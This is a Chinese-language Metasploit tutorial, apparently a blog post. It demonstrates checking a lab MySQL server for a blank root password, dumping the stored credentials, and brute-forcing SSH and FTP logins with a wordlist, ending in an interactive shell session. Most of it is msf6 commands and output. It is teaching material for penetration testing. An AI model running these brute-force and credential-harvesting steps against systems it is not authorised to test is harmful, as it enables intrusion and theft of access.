1.1 Metasploit攻击实例
1.1.1 攻击空密码的mysql服务
1.1.1.1 扫描主机并导入metasploit
# nmap -A -T4 -v 192.168.1.120 -oX /tmp/192.168.1.120.xml msf6 > db_import /tmp/192.168.1.120.xml msf6 > hosts -R 192.168.1.120

msf6 > services -R 192.168.1.120

1.1.1.2 验证主机是否存在mysql空密码漏洞
msf6 > search mysql type:auxiliary

msf6 > use auxiliary/scanner/mysql/mysql_login msf6 auxiliary(scanner/mysql/mysql_login) > show options

msf6 auxiliary(scanner/mysql/mysql_login) > set USERNAME root USERNAME => root msf6 auxiliary(scanner/mysql/mysql_login) > set BLANK_PASSWORDS true BLANK_PASSWORDS => true msf6 auxiliary(scanner/mysql/mysql_login) > set RHOSTS 192.168.1.120 RHOSTS => 192.168.1.120 msf6 auxiliary(scanner/mysql/mysql_login) > run

1.1.1.3 获取数据库中所有凭证
msf6 auxiliary(scanner/mysql/mysql_login) > creds

1.1.1.4 导出扫描结果给其他metasploit使用
msf6 auxiliary(scanner/mysql/mysql_login) > db_export -f xml /tmp/192.168.1.120-mysql.xml [*] Starting export of workspace default to /tmp/192.168.1.120-mysql.xml [ xml ]... [*] Finished export of workspace default to /tmp/192.168.1.120-mysql.xml [ xml ]...
1.1.2 暴力破解SSH
1.1.2.1 对ssh进行暴力破解
msf6 > search ssh_login

msf6 > use 0 msf6 auxiliary(scanner/ssh/ssh_login) > show options

msf6 auxiliary(scanner/ssh/ssh_login) > set RHOSTS 192.168.1.120 RHOSTS => 192.168.1.120 msf6 auxiliary(scanner/ssh/ssh_login) > set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt USERPASS_FILE => /usr/share/metasploit-framework/data/wordlists/root_userpass.txt msf6 auxiliary(scanner/ssh/ssh_login) > set STOP_ON_SUCCESS true STOP_ON_SUCCESS => true msf6 auxiliary(scanner/ssh/ssh_login) > exploit

1.1.2.2 破解后进行验证
msf6 auxiliary(scanner/ssh/ssh_login) > sessions

msf6 auxiliary(scanner/ssh/ssh_login) > sessions -i 8 [*] Starting interaction with 8... whoami msfadmin ls vulnerable background Background session 9? [y/N] y
1.1.3 暴力破解FTP
1.1.3.1 对ftp进行暴力破解
msf6 > search ftp_login

msf6 > use 0 msf6 auxiliary(scanner/ftp/ftp_login) > show options

msf6 auxiliary(scanner/ftp/ftp_login) > set RHOSTS 192.168.1.120 RHOSTS => 192.168.1.120 msf6 auxiliary(scanner/ftp/ftp_login) > set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt USERPASS_FILE => /usr/share/metasploit-framework/data/wordlists/root_userpass.txt msf6 auxiliary(scanner/ftp/ftp_login) > set STOP_ON_SUCCESS true STOP_ON_SUCCESS => true msf6 auxiliary(scanner/ftp/ftp_login) > exploit


我的微信
如果有技术上的问题可以扫一扫我的微信